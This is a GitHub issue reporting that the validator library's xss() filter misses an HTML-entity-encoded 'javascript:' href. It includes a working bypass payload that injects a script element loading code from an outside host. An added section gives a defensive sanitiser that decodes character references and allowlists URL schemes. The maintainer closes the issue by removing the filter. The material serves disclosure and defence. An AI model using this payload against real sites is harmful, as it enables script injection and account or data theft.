xss() should remove "javascript" #181

Closed
taku0 opened this issue May 6, 2013 · 0 comments

taku0 commented May 6, 2013

xss() removes string "javascript" in attributes; however, this is insufficient since browsers interpret <a href="jav&#x61;script:...">abc</a> as <a href="javascript:...">abc</a>.

Example

var validator = require('validator');

console.log(validator.sanitize("<a href=\"jav&#x61;script:var x=(document).createElement('script');x.src='http://www.example.org';(document).body.appendChild(x);(alert)('')\">abc</a>").xss());

Expected

<a >abc</a>

Actual (version 1.1.1)

<a href="jav&#x61;script:var x=(document).createElement('script');x.src='http://www.example.org';(document).body.appendChild(x);(alert)('')">abc</a>
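
The bypass reported above works because the browser decodes character references in the attribute value before it parses the URL, so a filter has to normalise the value the same way and then allowlist the scheme. The sketch below is an added example, not code from validator or from this issue; the function names, the allowlist and the small named-reference table are assumptions.

```javascript
// Added example; ALLOWED_SCHEMES, NAMED, decodeCharRefs and isSafeHref are
// hypothetical names, not part of the validator library.
const ALLOWED_SCHEMES = new Set(['http', 'https', 'mailto']);

// Minimal subset of named references (assumption). A production filter
// should rely on a full HTML parser instead of this table.
const NAMED = new Map([['colon', ':'], ['Tab', '\t'], ['NewLine', '\n'],
  ['amp', '&'], ['lt', '<'], ['gt', '>'], ['quot', '"']]);

// Decode character references in one pass (decoded output is not
// re-scanned). Numeric references count even without a trailing ';'.
function decodeCharRefs(s) {
  const re = /&#[xX]([0-9a-fA-F]+);?|&#([0-9]+);?|&([A-Za-z]+);/g;
  return s.replace(re, (m, hex, dec, name) => {
    if (name !== undefined) return NAMED.has(name) ? NAMED.get(name) : m;
    const cp = hex !== undefined ? parseInt(hex, 16) : parseInt(dec, 10);
    return cp === 0 || cp > 0x10ffff ? '\ufffd' : String.fromCodePoint(cp);
  });
}

// True only for relative URLs and URLs whose scheme is on the allowlist.
function isSafeHref(raw) {
  const url = decodeCharRefs(raw)
    .replace(/[\t\n\r]/g, '')           // URL parsers drop these anywhere
    .replace(/^[\u0000-\u0020]+/, '');  // and leading controls and spaces
  const prefix = url.split(/[\/?#]/, 1)[0];
  if (prefix.includes('&')) return false; // undecoded reference: fail closed
  const colon = prefix.indexOf(':');
  if (colon === -1) return true;          // no scheme, relative URL
  return ALLOWED_SCHEMES.has(prefix.slice(0, colon).toLowerCase());
}

// The substring check the issue reports as insufficient, for comparison.
const substringCheck = (v) => !/javascript/i.test(v);

// Constructed samples; the first is the href form from the issue.
for (const href of ['jav&#x61;script:...', 'https://www.example.org/', '/docs?a=1&b=2']) {
  console.log(href, substringCheck(href), isSafeHref(href));
}
```

The substring check accepts the encoded value because the literal word never appears in the raw attribute, while the normalised allowlist check rejects it.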
chriso added a commit that referenced this issue Oct 31, 2013
The xss() function was originally a port of the XSS filter from
CodeIgniter. I added it to the library because there wasn't an
alternative at the time. Unfortunately I don't have the time or
expertise to maintain the XSS filter or keep merging upstream
changes.

If you need one for your app, I suggest looking at the Caja sanitisation
engine maintained by Google.
(https://code.google.com/p/google-caja/source/browse/trunk/src/com/google/caja/plugin/html-sanitizer.js)

Closes #123, #138, #181, #206, #210, #221, #223, #226, #227, #231, #232
@chriso chriso closed this as completed Oct 31, 2013